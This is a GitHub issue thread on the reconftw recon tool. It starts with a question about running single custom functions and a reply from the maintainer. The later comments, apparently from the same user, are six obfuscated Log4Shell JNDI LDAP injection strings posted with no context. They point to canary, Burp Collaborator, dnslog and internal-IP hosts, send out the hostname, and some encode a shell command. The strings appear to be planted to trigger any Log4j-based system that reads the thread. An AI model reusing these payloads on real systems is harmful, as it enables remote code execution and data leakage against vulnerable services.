### ISSUE TITLE
Custom Function in Dev update?

### ISSUE THREAD

**Issue by jakre1234** [six2dez/reconftw#381]
What is the the commit regarding custom function in dev channel? Is it something we can run custom function or like what it is?

**Comment by six2dez** [comment]
I'm still testing it, but that feature will allows you to run any single function inside reconFTW, for example `./reconftw.sh -d target.com -c nuclei_checks`. It's like an advanced feature because it needs the files stored in the default folders, etc

**Comment by jakre1234** [comment]
You must provide a documentation stating the function names and the flow (order in which we need to perform them). Also when the custom function is used in stat, it throws error directory doesn't exist. so give a flow in order to run the custom functions

**Comment by jakre1234** [comment]
As of now it's highly unstable and completely broken, i guess if everyone can help on this to improve, instead of errors we need to return nice little message stating that, we need to perform XXX step before performing this one. Also each function should be individual.

**Comment by jakre1234** [comment]
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//x${hostName}.L4J.mzgy8p94o97rp4tx1lyleir9s.canarytokens.com/a}

**Comment by jakre1234** [comment]
${${env:barfi:-jndi${env:barfi:-:}${env:barfi:-ldap${env:barfoo:-:}//x${hostname}.sxtl2r3wpwugwyvp36q6nzka319rxg.burpcollaborator.net/ext}

**Comment by jakre1234** [comment]
${${env:barfi:-jndi${env:barfi:-:}${env:barfi:-ldap${env:barfoo:-:}//x${hostname}.zsvqoe3h34xijhz4odhdtf8v6mcd02.burpcollaborator.net/Basic/Command/Base64/bHM=}

**Comment by jakre1234** [comment]
${${env:barfi:-jndi${env:barfi:-:}${env:barfi:-ldap${env:barfoo:-:}//x${hostname}.sxpwzs.dnslog.cn/Basic/Command/Base64/bHM=}

**Comment by jakre1234** [comment]
172.18.0.1
${${env:barfi:-jndi${env:barfi:-:}${env:barfi:-ldap${env:barfoo:-:}//x${hostname}.172.18.0.1:9999/Basic/Command/Base64/bHM=}

**Comment by jakre1234** [comment]
${${env:barfi:-jndi${env:barfi:-:}${env:barfi:-ldap${env:barfoo:-:}//x${hostname}.172.17.0.4:9999/Basic/Command/Base64/bHM=}
